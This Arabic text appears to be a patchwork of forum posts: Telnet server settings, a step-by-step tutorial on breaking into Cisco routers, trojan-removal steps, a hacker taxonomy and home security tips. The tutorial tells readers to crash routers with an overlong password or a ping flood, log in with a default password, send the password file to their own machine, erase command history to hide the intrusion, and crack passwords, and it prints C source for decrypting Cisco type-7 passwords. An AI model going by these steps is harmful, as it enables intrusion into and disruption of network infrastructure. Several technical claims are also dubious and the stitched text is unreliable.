تعيين الحد الأقصى لمحاولات تسجيل الدخول الفاشلة المسموح بها للمستخدم. يجب عليك تحديد هذا العدد بواسطة عدد صحيح موجب أصغر من 100.
لتعيين المهلة من أجل خمول جلسات العمل على كمبيوتر يشغل ملقم Telnet
بناء الجملة
tlntadmn [\\RemoteServer] config [timeout=hh:mm:ss]
المعلمات
\\RemoteServer
تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقماً ما، سيتم افتراض الملقم المحلي.
timeout=hh:mm:ss
تعيين فترة المهلة بالساعات، والدقائق، والثواني
برامج تلنت

وجد العديد من برامج تلنت المستقلة (Telnet programs) نذكر منها:
• برنامج EWAN الخاص بمنصات ويندوز .(Windows)
• برنامج NCSA الخاص بمنصات ماكنتوش .(Macintosh)
ويعد هذان البرنامجان أكثر برامج تل نت انتشاراً لسهولة إعدادهما (set up) وتهيئتهما (configure)، ويمكن تنزيلهما من الإنترنت مجاناً

بسم اللة الرحمن الرحيم

اليكم الموضوع :
----------------------------
عن الراوترات واهميتها في الشبكات ووظيفتها على الانترنت ومقدمة بسيطة للتعامل معها . واليوم سنقوم بالتوغل اكثر وبتفصيل اكبر في احد هذه الانواع من الراوترات وهو اكثرها شهرة على الانترنت واكثرها استخداما وهي من نوع Cisco Routers
فتح عينك وشغل راسك واقعد كويس علشان هانروح رحلة الى عالم Cisco Systems ... ومتنساش تربط الحزام

تحذير : لا تقوم باستغلال هذه المعلومات في تخريب cisco systems , هذا الموضوع لغرض تعليمي فقط , فقط استعمل المعلومات في الطريق السليم . ويجب ان تعلم انه بتخريبك لراوترات سيسكو او حتى مجرد تعطيلها يمكنه ان يتسبب في مشاكل لمئات من مستخدمين الانترنت وخسائر بالاف الدولارات مما يوقعك في مشاكل انت في غنى عنها

المحتويات :

في البداية وقبل ان نبدء :

- ما هو عنوان IP

- ما هو الـ ISP

- ماذا تعني TCP/IP packet

- كيف اقوم بعمل spoof للـ IP

- كيف اقوم باستخدام Telnet

- كيف استخدم HyperTerminal

- كيف استفيد من Ping

- كيف استخدم TraceRoute

- كيف استعمل proxy server


- الفصل الاول : لماذا اقوم بأختراق cisco router

- الفصل الثاني : كيف اعثر على cisco router

- الفصل الثالث : كيف اقوم بكسر cisco router والدخول اليه

- الفصل الرابع : كيف اقوم بكسر الباسوردات لـ cisco router


اساسيات يجب عليك معرفتها قبل البداية :


- ما هو عنوان IP :

IP هو اختصار لـ Internet Protocol , وكل جهاز او سيرفر على شبكة الانترنت يمتلك اي بي اما يكون ثابت او ديناميكي اي متغير , ولا يمكن بأي حال من الاحوال ان يتشابه رقمان IP , واجهزة الكمبيوتر تتعرف على بعضها عن طريق ارقام IP الخاصة بها كما يتعرف البشر على بعضهم عن طريق اسمائهم .
ويسهل الحصول على ارقام الاي بي الخاصة بك عن طريق الكثير من الطرق والادوات ,,,, فيمكن مثلا :
- تدخل على احد المواقع فيقوم الموقع بتخزين الاي بي الخاص بك في ملفات الـ log
- يستطيع اي احد الحصول على الاي بي الخاص بك عن طريق الـ IRC
- وكذلك على ICQ يستطيع اي احد الحصول على الاي بي الخاص بك حتى لو كنت قد اختارت خاصية "do not show ip" فبأمكانهم ايضا الحصول عليه
- اذا قمت بالاتصال بأي شخص على الانترنت فبأمكانه كتابة "systat" ورؤية رقم اي بي المتصل معه
- ممكن يا حد يبعتلك ايميل يحتوي على IP-logging java وبكده يقدر يحصل على الاي بي الخاص بك
وتوجد طرق اخرى كثيرة للحصول على رقم IP الخاص بك ومن ضمنها برامج التروجن مثل Sub7 او NetBus.


- ما هو الـ ISP :

ISP هو اختصار لجملة Internet Service Provider وهو ده اللي بيوصلك الانترنت او اللي انت بتدخل على الانترنت عن طريقه بواسطة dial-up ,,, وبأمكان الاخرين ان يعرفو الـ ISP بتاعك عن طريق عمل traceroute على الاي بي بتاعك .. حيث ستخرج نتائج مشابهة للنتيجة التالية :

tracert 222.222.22.22

Tracing route to [221.223.24.54]
over a maximum of 30 hops.
1 147ms 122ms 132ms your.isp [222.222.22.21]
2 122ms 143ms 123ms isp.firewall [222.222.22.20]
3 156ms 142MS 122ms aol.com [207.22.44.33]
4 * * * Request timed out
5 101ms 102ms 133ms cisco.router [194.33.44.33]
6 233ms 143ms 102ms something.ip [111.11.11.11]
7 222ms 123ms 213ms netcom.com [122.11.21.21]
8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]
9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<< target's isp
10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54]
Trace complete.


- ماذا تعني TCP/IP packet :

TCP/IP هو اختصار لـ Transmission Control Protocol و Internet Protocol .. والـ TCP/IP packet عبارة عن حزمة من المعلومات المضغوطة , والحزمة دي بتحتوي على حاجة اسمها header , والهيدر ده هو اللي بيحدد وجهة الحزمة في طريقها للاجهزة الاخرى على الشبكة , وهو ده تفسير انتقال البيانات عبر الانترنت , وضروري نعرف ان الـ header في حزم الداتا بيحتوي على اي بي مرسل هذه الحزمة او الجهاز المصدر , وعلى فكره انت تقدر تكتب بنفسك packet او حزمة وتجعلها كأنها قادمة من مصدر اخر غير المصدر الاصلي اللي طلعت منه وبالتالي تقدر تحصل على صلاحيات ادمين او روت او اي صلاحيات انت عايزها ... لكن خلي بالك .. علشان تعمل العملية دي لازم تكون بتستخدم لينيكس حيث انه بيوفرلك اداوت تقدر تنفذ بيها الطريقة دي ... ولكن ده مش موضوعنا الحالي .


- كيف تقوم بعمل spoof للـ IP :

حاول ان تحصل على برنامج مثل Genius 2 او DC IS .. ودول هايعملو على تزوير الايدينت بتاعك IdentD ,, يعني هايتغير جزء من عنوان جهازك على النت , وبأمكانك استعمال الطريقة دي على IRC حيث يمكنك الرجوع الى الروم اللي انت باند فيها وذلك عن طريق تغيير الايدينت كما يمكنك استخدام عملية ال spoof اثناء محاولة الحصول على صلاحيات روت على الاجهزة الاخرى ... حيث ان الاي بي اللي هايتخزن في ملفات الـ logs هايكون الاي بي المزور


- كيف اقوم باستخدام Telnet :

بأمكانك تشغيل الـ telnet ببساطه عن طريق الذهاب الى Start Menu ثم تختار Run ثم تكتب في المربع Telnet
اضغط على Terminal > Preferences , هنا تقدر تغير buffer size و font واشياء اخرى , كما تستطيع ايضا فتح او اغلاق "local echo" . وفي حالت فتح او تشغيل local echo فسيكون بأمكانك رؤية كل شيء تكتبه في نافذة التلنت كما سيكون بمقدورك رؤية مايكتبه الاخرون في الحال .
في الغالب يكون التلنيت متظبط على انه يتصل بـ telnet port اللي هو رقم 23 , ولكن انت بمقدورك تغيير رقم البورت في حالة رغبتك في الاتصال على اية خدمة او بورت اخر مثل بورت رقم 25 بتاع الميل او بورت رقم 21 لخمدة ال FTP وغيرها من البورتات ,,,, يوجد الالاف من المنافذ لذا يجب تحديد وجهتك قبل الاتصال .


- كيف استخدم HyperTerminal :

HyperTerminal يقوم بفتح "server" على اي بورت في جهازك ليقوم بالاستماع الى المعلومات القادمة الى جهازك من الاجهزة الاخرى اللي انت تحددها
ولتشغيل HyperTerminal اذهب الى Start > Programs > Accessories > Communications > HyperTerminal . في البداية يجب عليك اختيار نوع الاتصال .. لذا قم بأختيار "TCP/IP Winsock" ثم حدد الهوست او الاي بي ثم حدد البورت واعمل اتصال او Call .. وتقدر تخلي البرنامج على وظيفة الاستماع او listening لاستقبال المعلومات القادمة من اجهزة اخرى عن طريق اختيار Call > Wait for Call , كما تستطيع عمل Chat او نقل للملفات عن طريق هذا البرنا

- كيف استفيد من Ping :

اداة Ping تعتبر من ابسط الادوات , كل اللي عليك انك تفتح نافذة MS-DOS prompt ثم تقوم بكتابة "ping ip.address" , في العادة هايعمل بنج ثلاث مرات ثم يتوقف , ولكن انت بأمكانك كتابة :
"ping ip.address -t"
وده يخليه يعمل بنج بدون توقف , ولتغيير حجم حزمة البنج المرسلة .. اكتب :
"ping -l (size) ip.address"
وعملية Ping هي عبارة عن ارسال حزمة داتا الى جهاز معين تقوم بتحديده ثم ترى الرد على الحزمة اللي انت ارسلتها , وتقدر تستفيد من الموضوع ده في معرفة سرعة الاتصال للجهاز . و الـ Ping ايضا يمكنه ان يقوم بتهنيج الجهاز او انهياره وذلك عن طريق عمل ping floods اي ارسال حزم كثيرة ذات احجام كبيرة بسرعة وبدون توقف الى احد الاجهزة . Windows 98 ممكن ينهار بعد دقيقة واحده فقط من ping flood عليه , وذلك لان البنج يقوم بأستهلاك حجم كبير من الـ bandwidth ممكن يؤدي الى قطع الاتصال او تهنيج النظام .
واحب اوضح ان عملية Ping flooding ضد الاهداف الكبيرة زي سيرفرات مواقع مثلا يكون غير مجدي وغير فعال
ملاحظة : اختيار -t مع البنج لا يعني انه فلوود حقيقي , ولكن يعني عمل بنج للهدف بصورة مستمرة . بينما في جميع توزيعات Unix او Linux يمكنك استخدام الخاصية ping -f لعمل فلووود بنج حقيقي وفعال


- كيف استخدم TraceRoute :

عملية TraceRoute تستخدم لتتبع جهاز او اي بي معين , يعني مثلا لتقوم بتتبع اتصالك لكي تعرف الاجهزة اللي بينك وبين الهدف , كل اللي عليك انك تفتح نافذة MS-DOS prompt ثم تقوم بكتابة "tracert ip.address" وسوف تظهر لك قائمة بالاجهزة اللي بينك وبين الجهاز الهدف . ومن خلال الحكاية دي تقدر تحدد اذا كان فيه firewalls موجوده او تحديد ISP (internet service provider) لاي شخص
وساقوم الان بشرح مبسط وموجز لميكانيكية عمل TraceRoute لكي يسهل عليك فهمها :
اولا عند قيامك بأمر TraceRoute على اي بي او جهاز معين فيقوم جهازك بارسال TCP/IP packet تحتوي على قيمة معينة في الـ header بتاع الحزمة , هذه القيمة تسمى TTL وهي اختصار لـ Time To Live . وعند مرور الحزمة على الاجهزة والراوترات فتنقص قيمة الـ TTL بمقدار واحد عند كل راوتر او جهاز , والحكاية دي مهمة جدا .. لان احيانا يحصل خطأ معين في اي حاجه سواء في الحزمة او الاجهزة مما يؤدي الى ان الحزمة تفضل ماشية في الشبكة بدون توقف وتقوم باستهلاك كمية كبيرة من الـ bandwidth , ولهذا عندنا ينقص مقدار الـ TTL ويصل الى الصفر .. فتموت الحزمة ويقوم بروتوكول ICMP بأرسال رسالة خطأ الى مرسل الحزمة
اما اذا لم يوجد اخطاء فأن الحزمة ستقوم بأرسال رسالة الى مرسلها عند مرورها على كل جهاز او راوتر الى ان تصل الى الجهاز الهدف
اتمنى تكونو فهمتو على الاقل الفكرة العامة للـ TraceRoute


- كيف استعمل proxy server :

قم بالبحث في شبكة الانترنت عن اي من proxy server على البورت اللي انت عاوزه , وعندما تجد احدها قم بالاتصال به عن طريق telnet او hyperterminal او غيرها وبعد كده قم بالاتصال بأجهزة اخرى من خلال هذا البروكسي وبكده فلن يعرف احد عنوان الاي بي الحقيقي لك

==============================================

- الفصل الاول : لماذا اقوم بأختراق cisco router ؟

اعتقد ان البعض هايسأل نفسه .. لماذا اقوم بأختراق cisco router ؟
وانا عارف ان البعض يقوم بالاختراق بهدف التخريب بس .. ولكن لو هو حدد الهدف المنشود من عملية الاختراق وعرف ممكن يستفيد من النظام اللي اخترقه ازاي فسوف يختلف الوضع تماما ... خلونا نشوف ايه الفايدة من اختراق cisco routers
اولا : راوترات سيسكو تتميز بسرعة عالية جدا حيث انها تستخدم نظام اتصال 18 T1 الفائق السرعة , واحنا شرحنا الدرس اللي فات وظيفة راوترات سيسكو في ربط الشبكات ... يعني تخيل مثلا ان راوتر خارج منه العديد من خطوط الانترنت الى سيرفرات او ISP وكل سيرفر او ISP طالع منه خطوط تانيه لاجهزة اخرى فتخيل السرعة اللي لازم يكون عليها الراوتر علشان يقدر يمد كل الاجهزة دي بالسرعة اللازمة لها ... اذن نستنتج من هنا انك تقدر تستخدم الراوتر في هجوم DENIAL OF SERVICE اللي بيكون مؤثر اذا كان الهجوم له سرعة عالية زي الراوتر كده كما تستطيع اختراق انظمة اخرى من خلال الراوتر زي ماوضحنا قبل كده في الدرس اللي فات وذلك عن طريق استغلال خدمة الـ Telnet الموجودة في الراوتر .
ايضا يجب ان تعرف ان هناك الاف من الـ packets او الحزم تمر عبر وخلال هذا الراوتر وبالتالي تستطيع ان تقوم بالتقاط بعض هذه الحزم ثم تقوم بعمل decoded لها ورؤية كل المعلومات السرية والخاصة والباسوردات و و و و.... التي تمر عبر الراوتر
واضيفلك معلومة كمان وهي ان راوترات سيسكو هي trusted systems زي اداوت يونيكس rcp و rsh اللي بتديك اكسس وصلاحيات في الشبكة المحلية بتاعتها وبالتالي تقدر تشوف شغلك على الاجهزة اللي موجودة في الشبكة ( للمزيد من المعلومات عن اداوت rcp و rsh راجع الدرس اللي كتبته بعنوان
http://www.redstaing.net/vbbb/showt...&threadid=10266


- الفصل الثاني : كيف اعثر على cisco router ؟

عملية ايجاد راوتر سيسكو هي عملية بسيطة وقانونية , دائما مايكون لدى اي ISP راوتر خاص به و معظم هذه الراوترات تكون من نوع سيسكو وتقدر انت تجيب عنوان اي بي الراوتر عن طريق انك تعمل traceroute على اي مستخدم من مستخدمي ISP معين ( شرحنا فوق عملية ISP ) وبعد ماتعمل traceroute على الـ IP فسيقوم باظهار كل الاجهزة والايبيهات اللي بينك وبينه ومن ضمنهم اي بي الـ ISP واي بي الراوتر بتاعه وغيره ... واحنا يهمنا هنا اي بي الراوتر بس , وده مثال :
tracert 222.222.22.22

Tracing route to [221.223.24.54]
over a maximum of 30 hops.
1 147ms 122ms 132ms your.isp [222.222.22.21]
2 122ms 143ms 123ms isp.firewall [222.222.22.20]
3 156ms 142MS 122ms aol.com [207.22.44.33]
4 * * * Request timed out
5 101ms 102ms 133ms cisco.router [194.33.44.33]
6 233ms 143ms 102ms something.ip [111.11.11.11]
7 222ms 123ms 213ms netcom.com [122.11.21.21]
8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]
9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<< target's isp
10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54]
Trace complete.
قم بتحويل المثال الى اليسار علشان تقدر تشوفه
نلاحظ عند الجهاز الخامس انه راوتر سيسكو
دلوئتي انت حددت الراوتر وعنوانه , لكن احتمال ان الراوتر يكون محمي بـ firewall علشان كده لازم تبعتله بنج Ping مرتين وتنتظر الرد , فلو طلع فيه رد اذن ده مؤشر ان الراوتر معليهوش حماية من firewall اما لو لقيت مفيش رد يبئى تعرف ان الراوتر عليه حماية من firewall وان الاي بي بتاعك اتعمله بلوك من الراوتر
طرقة تانية لمعرفت ان كان يوجد firewall او لاء هي انك تفتح التيلنت وتشبك على الراوتر عن طريق البورت رقم 23 عادي .... فلو طلعلك حاجه بتقولك ادخل الباسورد ومفيش يوزر نيم .. اذن تعرف انك دلوئتي على الراوتر , اما لو طلعلك رسالة بتقولك ادخل اليوزر نيم والباسورد فتعرف ان انت دلوئتي موجود داخل الفاير وول
من الاخر كده علشان تريح دماغي ودماغك .. دورلك على راوتر مش محمي من فايروول , ويبئى لينا لقاء تاني عن موضوع الفايروول ده . المهم دلوئتي اول ماتلاقي راوتر كويس كده و ابن حلال ومعليهوش فايروول .. ابدء بالبحث عن proxy server يسمح بالاتصال عن طريق البورت 23 علشان الاي بي بتاعك لا يتم تسجيله في ملفات الـ LOGs للراوتر


- الفصل الثالث : كيف اقوم بكسر cisco router والدخول اليه

معظم راوترات سيسكو تقوم بتشغيل نظام v4.1 software على الجهاز اللي يعتبر ضعيف الحماية . فبأمكانك انك تشبك على الراوتر عن طريق التيلنت بالبورت 23 ثم تقوم بأدخال باسورد كبيرة وطويلة مثل هذه :

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk1029384 7465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpw oeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeiruty alskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjf hgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxnc bv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019ds k10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

انتظر قليلا .. فيه احتمال ان الراوتر يحصله reboot او ريستارات , طبعا مش هاتقدر تخترقه لانه offline في الحالة دي . لكن غالبا مش هايحصله ريستارت .. انما هاتحصله عملية freeze او يهنج لفتره تمتد من 2-10 دقايق وفي الفترة دي انت لازم تعمل على اختراق الراوتر
اما لو حصل اي حاجه غير كده فذلك يعني ان نظام تشغيل الراوتر ليس v4.1 software .. وان الباسورد الطويلة ان تنجح معاه , والحل؟
في الحالة دي ممكن تستخدم هجوم DOS على الراوتر .. زي مثلا فلووود بنج , روح للدوس واكتب "ping -l 56550 cisco.router.ip -t" , وده هايجيب نفس النتائج اللي في الحالة الاولى
دلوئتي واثناء الراوتر في حالة frozen او تهنيج .. قم بفتح كونكشن او اتصال تاني مع الراوتر عن طريق بروكسي اخر ( لازم يكون بروكسي يختلف عن الاول ) وبعد كده اكتب الباسورد دي "admin" .... ممكن واحد يسأل ويقول لماذا لم يتم استخدام الباسورد من الاول ؟
والسبب هو ان هذه الباسورد هي الـ default password لاغلب راوترات سيسكو , وعندما يكون الراوتر في حالة frozen او تهنيج فأنه يعد نفسه على وضع الـ default بتاعه
والان وبعد دخولك الى الراوتر يجب عليك طلب ملف الباسورد , لازم تعرف ان انظمة تشغيل راوترات سيسكو متعدده وليس نظام واحد ولكن الـ prompt الشائع لها غالبا مايكون زي كده : "htl-****il" , الان قم بكتابة "?" علشان تظهر قائمة الاوامر وطبعا هاتظهرلك قايمة كبيرة من الاوامر , حاول تبحث عن امر النقل transfer command .. ثم استخدمه للحصول على ملف الباسورد للادمين ( خلي بالك انك الادمين حاليا ) ثم قم بأرسال الملف الى عنوان IP الخاص بك على البورت 23 .. ولكن قبل ان ترسل الملف الى جهازك يجب ان تعمل الاتي :
قم بتشغيل برنامج HyperTerminal ( تم شرح البرنامج في اول الموضوع ) وبعد تشغيله قم بجعله على وضع wait for a call من راوتر سيسكو .. يعني تخلي البرنامج على وضعية الترقب لانتظار اشارة من عنوان راوتر سيسكو . ودلوئتي اول ماتقوم بأرسال الملف من الراوتر .. فسوف يقوم برنامج HyperTerminal بسؤالك ان كنت تريد استقبل الملف المرسل من الراوتر , اختار yes واحفظ الملف على الهارد عندك . وقبل ماتخرج من الراوتر وتفصل .. قم بمسح الـ history علشان محدش يعرف انك دخلت وذلك عن طريق كتابة الامر التالي في التريمينال "history size 0"
وبعد كده اعمل Logout
وبكده اقدر اقولك انك خلصت اهم الجزء الاصعب والاهم في الموضوع كله ... تقدر تستريح شوية دلوئتي علشان تستعد لكسر الباسورد اللي حصلت عليها


- الفصل الرابع : كيف اقوم بكسر الباسوردات لـ cisco router ؟

والان وبعد ان قمت بأحضار ملف الباسورد الى جهازك فأنت محتاج لكسره لكي تمتلك الباسوردات اللي تمنحك الصلاحيات الكاملة لدخول الراوتر مرة اخرى . ولعمل ذلك .. قم بأستخدام برنامج مثل John the Ripper او اي برنامج اخر لكسر الباسوردات .
دي تعتبر اسهل طريقة وانا انصح بها . والطريقة الاخرى هي فك تشفير الملف , وسوف تحتاج الى برامج فك التشفير .. ويوجد منها الكثير .. وممكن عن طريق الاكواد البرمجية التي تقوم بفك التشفير وكسر الباسوردات
وده كود يقوم بفك تشفير باسورد راوترات سيسكو . وانت عليك تعمله compile تحت نظام يونيكس او لينيكس
اعمل Ctli + Shift لرؤية الكود بالطريقة السليمة


#include <stdio.h>
#include <ctype.h>

char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
**;

char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)
return(-1);

seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
**

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
**

if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
**

if(strlen(enc_pw) != i)
return(-1);
**

dec_pw[++i / 2] = 0;

return(0);
**

usage()
{
fprintf(stdout, "Usage: %s -p <encrypted password>\n", pname);
fprintf(stdout, " %s <router config file> <output file>\n", pname);

return(0);
**

main(argc,argv)
int argc;
char **argv;

{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
**

if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;

case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
**
fprintf(stdout, "password: %s\n", passwd);
break;

default:
fprintf(stderr, "%s: unknow option.", pname);
**

return(0);
**

if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
**

while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;

fclose(in);
fclose(out);
return(0);
**
if(line[i] == '\r')
i--;

if(line[i] == '\n')
break;
**
pw_pos = 0;
line[i] = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);

if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
**

if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
**
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);

fprintf(out, "%s\n", passwd);
**
**
**


اما اذا لم تكن تمتلك نظام Linux فالطريقة الوحيدة هي استخدام برنامج زي John the Ripper او اي برنامج كسر باسورد اخر .

---------------------------------------------

لتحميل برنامج John the Ripper
http://www.openwall.com/john/

ودي قايمة بأشهر اوامر راوترات سيسكو واللي موجوده في جميع السوفت وير بتاعتها


<1-99> Session number to resume
access-enable Create a temporary Access-List entry
access-profile Apply user-profile to interface
clear Reset functions
connect Open a terminal connection
disable Turn off privileged commands
disconnect Disconnect an existing network connection
enable Turn on privileged commands
exit Exit from the EXEC
help Description of the interactive help system
lock Lock the terminal
login Log in as a particular user
logout Exit from the EXEC
mls exec mls router commands
mrinfo Request neighbor and version information from a multicast router
mstat Show statistics after multiple multicast traceroutes
mtrace Trace reverse multicast path from destination to source
name-connection Name an existing network connection
pad Open a X.29 PAD connection
ping Send echo messages
ppp Start IETF Point-to-Point Protocol (PPP)
resume Resume an active network connection
rlogin Open an rlogin connection
set Set system parameter (not config)
show Show running system information
slip Start Serial-line IP (SLIP)
systat Display information about terminal lines
telnet Open a telnet connection
terminal Set terminal line parameters
traceroute Trace route to destination
tunnel Open a tunnel connection
where List active connections
x28 Become an X.28 PAD[/hide

ماهو الباتش ؟
============
هذا الملف يا أحبابي ظهوره كان يعتبر حلم للهاكرز فهذا الملف السحري به يستطيع الهاكر أن يحصل على سيطره كامله على الجهاز المصاب بهذا الملف0
فمنه يستطيع تغيير أو حذف أو حتى اضافة ملفات للجهاز0 ومنه يستطيع أن يتحكم با لأجهزه الموجوده كفتح السي دي روم أو حتى فصل بطاقة الصوت من الجهاز0

كيفية حذف الملف من جهازك ؟
=========================
طريقه سهله جدا0فقط اتبع الخطوات التاليه
1:في قائمة ابدأ اختر الأمر run
2:اكتب هذه الكلمه في الشريط الذي يظهر لك ( regedit ) ثم اضغط (موافق )
3:من القائمه اختر (hkey-local-machine )
4:بعد ذلك اختر (software)
5:ثم اختر (microsoft )
6:بعد ذلك اختر (windows )
7:ثم اختر (current version)
8:وأخيرا اختر (run)
9:في القائمه التي ستظهر لك راجع الملفات الموجوده وابحث عن ملف (patch.exe) أو أي ملف استقبلته ولم يعمل معك وقم بحذفه من جهازك نهائياثم أعد تشغيل جهازك0 انتهى
==============================================
الى هنا أحبابي نكون وفرنا لأجهزتنا الحمايه من اختراقها من قبل الهكرز0 وللمعلوميه الهكرز اذا اخترقو أي جهاز يستطيعون عمل ما يلي :
عكس الشاشه بالمقلوب000 جعل الشاشه كلها زرقاء00 تعطيل الجهاز لفتره زمنيه محدده أو لمده طويله حسب رغبة الهكر وحنية قلبه00 سرق صور وملفات وبرامج من الجهاز00 الاستيلاء على اشتراك صاحب الجهاز ( اشتراك الانترنت )00وأشياء كثير كثير ما حد يتوقعها
وهنـا يا أعزائي نكون قد أكملنـا معلومـات عن الهكر

شكرا على الموضوع و الف مبروك على التثبيت

Cracker
هاكر يستخدم برامج او تقنيات في محاولات لاختراق الأنظمة او الاجهزه للحصول على معلومات سرية او للتخريب كا ختراق مزودات شركة و حذف او إضافة معلومات . وكان هذا الاسم يطلق على من يحاول إزالة أو فك الحماية التي تضيفها شركات إنتاج البرمجيات على برامجها لمنع عمليات النسخ غير القانوني, أما الأن ,تم تصنيف هذا النوع من المخترقين في فئه خاصة سميت بالقراصنة (Pirates)
Phreak
هاكر يحاول التسلل بر الشبكات الهاتفيه اعتماداً على أساليب تقنية غير قانونية أو التحك بهذه الشبكات و يستخدم هؤلاء أدوات خاصة مثل مولدات النغمات الهاتفية. ومع تحول شركات الهاتف إلى استخدام المقاسم أو البدالات الرقمية عوضا عن الكهروميكانيكية القديمة, تحول هؤلاء إلى استخدام الأساليب البرمجية ذاتها التي يستخدمها الCrackers
مؤلفوا الفيروسات
يقوم هذا النوع من الهاكر بتصميم الفيروسات محبة في التخريب و تدمير الاجهزه و يعتبر المحللون النفسيون أن من ينتمي إلى هذا النوع من المبرمجين مصاب بمرض عقلي أو نفسي , يدفعه إلى هذه العمليات التخريبية التي لا يجني منها أي فائدة شخصية , ويعتبر هذا النوع من أخطر الانواع

Cypherpunks
يحاول هذا النوع من الهاكر الحصول على أدوات و خوارزميات التشغير المعقدة و القوية و توزيعها بصورة مجانية حيث تسمح هذه الادوات بإجراء عمليات تشفير لا يمكن فكها إلا باستخدام أجهزه كمبيوتر فائقة

Cyberpunk
تطلق هذه التسمية على كل من يستخدم مزيجا من الطرق المسبقة للقيام بعمليات غير قانونية

Anarchists
وهذا النوع هو الذي يروج معلومات مخالفة للقانون او مشبوهة على أقل تقدير مثل طرق ترويج صناعة المخدرات أو المواد المتفجرة أو قرصنة القنوات الفضائية و غيرها
ويوجد غير هذه الانواع من الهاكر ولكن هؤلاء الاهم

الحماية
لا تستقبل اي ملف كان من اي شخص حتى لو كنت تعرفه لانه فد يكون جهاز صديقك ملوث بالفيروسات دون علمه و تصاب بها
احمي جهازك ببرنامج مضاد للفيروسات مثل
Norton Anti virus
Mcafee Anti virus

وتحديث الرامج المضادة للفيروسات مهم اكثر مما تتصور , لان في اليوم الواحد يتم عمل 6 فيروسات في العالم , لكن لا تصمد جميعها طويلا أو يكون لها تأثير فعال الا القليل.
لا تفتح اي برنامج يأتي بالبريد حتى لو كان عنوان المرسل شركه برامج لانه فد يكون شخص غير عنوانه بعنوان الشركه.
قم بتغيير رقمك السري او ارقامك دوما حتى لو على الاقل مره كل شهر .
لا تجعل كل ارقامك السريه متماثله و هذه مهمه جدا و قم بجعل الارقام مختلفه و لا تشكل اي شي بحياتك و ان لم تستطع اجعل لكلماتك السريه قاعده غريبه و يفضل ان تجعل رقمك السري يحتوي على مزيج من الارقام و الاحرف
و اذا وصلتك رساله من الياهو (اذا كان بريدك من الياهو) يخبرك مثلا انك يجب ان تضغط على ربطه حتى تدخل من جديد(لاي سبب كان) فلا تفعل لانه عندما تضغط على الربطه سوف ينقلك لصفحة مشابهه لموقع بريدك و عندما تدخل رقمك السري سوف يصل رقمك السري الى الهاكر حتى قبل ما تدخل لبريدك , لا تستهين بهذه الطريقه .
لا تخبر احد باي رقم سري لك و ان اضطريت لا تنسى ان تقوم فورا بتغييره عندما ينتهي منه
عند كتابتك رقمك السري في مكان عام مثل كافي للانترنت قم بتغيير رقمك تحسبا لان يكون هناك شخص يراقبك عند الانتهاء من قرائة البريد قم بالخروج من الموقع عن طريق ربطه اسمها log out او ما شابه , و انتبه لان بعض مواقع البريد عند الضغط على خروح تقوم بسؤالك مره اخرى
عندما يرسل لك شخص ملف تاكد من انه لا ينتهي بالامتداد
exe
bat
com
vbs
و خاصة vbs
ملاحظه : يوجد انواع اخرى مثل ملفات الماكرو
و حتى لو ما كانت تنتهي بالامتداد هذا قم بفحصها ولا تنسى ان لا تقوم بتشغيل هذي الامتدادات حتى لو لم يجد برنامج المضاد للفيرسات فيروس لانها قد يكون المرسل هو من عمل الفيروس او فيروس جديد و غير معروف
لا تدخل مواقع مشبوهه لانك عندما تدخل اي موقع تكون مثلما عندما تشغل برنامج تقريبا حيث يستطيع صاحب الموقع ان يشغل فيروس على جهازك و معرفه اسمك و ملفاتك و نوع جهازك
لا تثبت برنامج
LockDown
في جهازك لانه يقوم بتثبيت ملفين يستطيع اي هاكر غبي ان يستكشف جهازك.
لا تثبت اي برامج هاكر في جهازك قد يكون مصمم لكي يخترق جهازك انت.
لا تخزن رقم بطاقة ائتمانك في الجهاز

كن حذرا جدا في استخدام هذه البرامج
ICQ
برنامج مشهور و الكثير يستخدمه و اتوقع ان الاغلبيه تعرف ان البرنامج هذا من البرامج المحبوبه عند الهاكر لأنه سهل الاختراق

برامج الشات كلها
